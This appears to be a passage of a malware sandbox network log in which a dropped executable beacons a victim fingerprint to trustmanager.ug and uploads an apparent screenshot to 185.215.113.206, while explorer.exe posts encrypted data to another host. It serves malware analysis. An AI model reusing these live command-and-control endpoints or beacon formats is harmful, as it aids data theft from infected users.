32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:04.725076914 CEST	16358	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
77	192.168.2.3	49803	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:04.667870998 CEST	16299	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:04.693721056 CEST	16351	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:04.693736076 CEST	16351	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
78	192.168.2.3	49804	185.215.113.206	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:04.794840097 CEST	16359	OUT	POST /k8FppT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----144fedd53f2aeee09aa4dbce6b6e9e32 Host: 185.215.113.206 Content-Length: 93811 Cache-Control: no-cache
Aug 23, 2021 02:09:04.795021057 CEST	16359	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 31 34 34 66 65 64 64 35 33 66 32 61 65 65 65 30 39 61 61 34 64 62 63 65 36 62 36 65 39 65 33 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 Data Ascii: ------144fedd53f2aeee09aa4dbce6b6e9e32Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
Aug 23, 2021 02:09:04.795310020 CEST	16369	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
Aug 23, 2021 02:09:04.795531988 CEST	16372	OUT	Data Raw: fc b8 7d 9b c9 ce ef 61 bb 38 fc 36 fb d7 05 6e 78 a7 24 df de ff 00 c9 7e 67 55 3e 56 d2 b2 fc 3f cc f9 57 53 55 4d 4a 50 a0 01 90 70 3e 82 aa 55 cd 57 fe 42 53 7e 1f c8 55 3c 57 44 be 26 73 2d 84 a5 a5 a5 34 80 6d 14 b4 b8 a0 06 f6 a5 c5 3b 14 Data Ascii: }a86nx$~gU>V?WSUMJPp>UWBS~U<WD&s-4m;b1KN&(1K)h(bSEv1@;EE%bRPbbPRQv((PF)h4} wLT!Z,;SIVb\mbIv(SIV
Aug 23, 2021 02:09:04.855607033 CEST	16376	OUT	Data Raw: 96 28 a1 96 48 a4 48 e6 52 d1 3b 29 02 40 09 04 a9 ee 32 08 e3 b8 ac 29 50 a7 4a 72 94 34 6f 7f c4 b9 d4 9c e2 94 ba 11 d1 56 ae 34 db fb 48 9e 5b 9b 1b 98 63 49 8c 0e f2 42 ca 16 40 32 50 92 38 6c 73 8e b4 eb 6d 23 53 bc fb 3f d9 74 db c9 fe d2 Data Ascii: (HHR;)@2)PJr4oV4H[cIB@2P8lsm#S?tyP3, rq"KVn4BP}UEKtH=o*[67Vs#b`84]VZ$IN^4}BVd{D__k]Mq!{Ic-AuV2yo$d
Aug 23, 2021 02:09:04.855814934 CEST	16378	OUT	Data Raw: 78 46 54 8b c4 90 b1 96 28 66 30 ce b6 d2 ca c1 55 27 31 30 88 e4 f0 0e fd b8 27 a1 c1 ac 3a 08 04 60 d6 b2 57 8b 5d cc d3 b3 b9 e8 5e 1f d1 4e 91 3e 91 36 a7 69 ac 5a 5e ca 35 21 73 67 79 2e c3 22 8b 42 4c b1 ab 46 0a ee ce dc 9d dc af 7e 95 04 Data Ascii: xFT(f0U'10':`W]^N>6iZ^5!sgy."BLF~<!kro2`OJw+ImZz<IxZG=vuP#Up=<tbUg$b;lo%3Q9]1{UXio
Aug 23, 2021 02:09:04.856054068 CEST	16381	OUT	Data Raw: c6 62 8a 7d 18 a2 c1 71 84 53 76 d4 98 a4 22 90 5c 8c 8a 42 2a 4c 53 71 4a c5 26 47 8a 4c 54 b8 a6 e2 a6 c5 5c 8f 14 62 a4 c5 37 14 ac 3b 8c c5 18 a7 d2 11 49 a1 dc 66 28 c5 2e 28 c5 2b 0e e3 48 a4 c5 3b 14 62 8b 00 cc 52 11 4f a4 c5 49 57 19 8a Data Ascii: b}qSv"\B*LSqJ&GLT\b7;If(.(+H;bROIW1OqAXbv))Rb7bE'zLRJ1@b(m8CK@"-BTF[#9Ss9B.Odg+jz}???XrWSG#V
Aug 23, 2021 02:09:04.856338978 CEST	16386	OUT	Data Raw: bd a4 52 b6 b5 3b a0 59 59 17 cb 48 81 04 8c e7 39 3c e7 8f 4f 4a f3 f1 7f c4 5e 86 4f 97 da 7b db 58 a3 e2 d4 d2 a0 f1 04 f6 ba 35 bf 95 6b 6d fb 92 de 63 31 91 c7 de 6e 49 ef c7 1c 71 5e 9b a8 bd 88 d5 2e c3 db dc 16 f3 9f 24 4e a0 13 b8 f6 d9 Data Ascii: R;YYH9<OJ^O{X5kmc1nIq^.$N^e/T48XP6~0y{?n?rykn>e]EFv"u;m:_65O/Okoddo?Z;%.vvWF[Hz("
Aug 23, 2021 02:09:04.856473923 CEST	16389	OUT	Data Raw: 8a 5b 18 76 34 dd a7 d2 af f9 8a 7a 8a 5f dd 9f e1 a3 d9 f9 87 b4 7d 8c fe 73 4a 33 8a d0 f2 a2 34 1b 68 8f 7a 5e c9 87 b5 46 7d 2d 5c fb 18 ec d4 9f 63 6e c6 8f 65 21 fb 48 95 28 ab 06 d2 41 da 9a 6d e4 1d 8d 2e 46 35 38 f7 21 c5 18 a9 0c 6c 3f Data Ascii: [v4z_}sJ34hz^F}-\cne!H(Am.F58!l?vqb1E%/zP(.%-.(a\mQ`b1JQLBQE.K@)RsKZbRi:qER7)qE:bJ*+.)NQ~(bH9F3Rm>QsZiON
Aug 23, 2021 02:09:04.856565952 CEST	16392	OUT	Data Raw: 03 03 f4 a9 6d 2e a6 b2 ba 8e e6 06 db 24 67 20 f6 f7 07 d4 11 c1 15 ed cb 2e a4 e9 72 75 bd ef fd 74 3c 28 e6 35 55 5e 7e 96 b5 bf ae a7 b6 5a 6b 76 fa fc 3e 1f be 83 00 b5 e3 2c 91 e7 25 1c 5b cd 91 fe 7b 57 8b 7c 67 ff 00 92 87 37 fd 7b 45 fc Data Ascii: m.$g .rut<(5U^~Zkv>,%[{W\|g7{EdI$@? fPxPT1k~Wuo{QA )hBIESs@rl<RE.iZZniAisLh/zu\@4)V$PwsN8vUSd&
Aug 23, 2021 02:09:04.856693029 CEST	16393	OUT	Data Raw: d8 aa b9 a3 34 bd 9c 46 58 37 72 f7 6c fd 4d 1f 6b 97 1f 7b 1f 41 55 b3 4b 4f 92 3d 83 62 c1 b9 95 87 32 31 fc 69 a6 46 6e ac 4f d6 a3 a2 8e 48 f6 0b b2 55 72 0e 6b a5 bd bc 78 be 1a b7 cd cb cf b7 f0 ae 5f a0 ad 5d 62 5c 7c 3e 86 3f 5b 93 5c 38 Data Ascii: 4FX7rlMk{AUKO=b21iFnOHUrkx_]b\\|>?[\8'w`%iK)bCM:zj<vS@P7,IV~\2y>oH4k+}Xo`9*>i":L\W:DC IF#NmmdLgl[Z=)C
Aug 23, 2021 02:09:05.111294985 CEST	16458	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 23 Aug 2021 00:09:05 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
79	192.168.2.3	49805	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:04.839518070 CEST	16373	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:04.866158009 CEST	16400	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:04.866174936 CEST	16400	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.3	49727	218.233.73.202	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:08:09.536305904 CEST	2811	OUT	POST /upload/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://atvcampingtrips.com/upload/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 161 Host: atvcampingtrips.com
Aug 23, 2021 02:08:09.536798954 CEST	2811	OUT	Data Raw: 39 6e 51 18 83 cb 1e 26 db af c9 71 00 01 7f bc 7d 7e ca 94 63 73 e5 16 0f 7e 78 e2 32 c5 ce 6e ef 29 b4 20 76 65 2b 1a ef 97 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 63 21 f3 ab Data Ascii: 9nQ&q}~cs~x2n) ve+?*$`7C[zqNA -[k,vuc!T8}jCv;\|Lu]JceZP^TGXc]+/fZRo
